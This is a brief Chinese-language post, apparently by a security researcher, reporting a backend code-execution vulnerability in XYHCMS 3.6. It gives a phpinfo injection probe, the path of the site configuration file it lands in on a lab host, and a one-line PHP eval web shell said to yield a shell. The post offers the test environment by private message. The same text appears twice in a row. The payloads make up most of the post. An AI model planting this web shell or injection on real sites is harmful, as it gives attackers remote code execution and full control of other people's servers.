XYHCMS 3.6 后台代码执行漏洞
<?=phpinfo();?>
http://192.168.107.131:1026/App/Runtime/Data/config/site.php
经过多次实验终于拿到shell <?php @eval($_POST[5]);?>
需要环境的私聊后期会放到站上
XYHCMS 3.6 后台代码执行漏洞
<?=phpinfo();?>
http://192.168.107.131:1026/App/Runtime/Data/config/site.php
经过多次实验终于拿到shell <?php @eval($_POST[5]);?>
需要环境的私聊后期会放到站上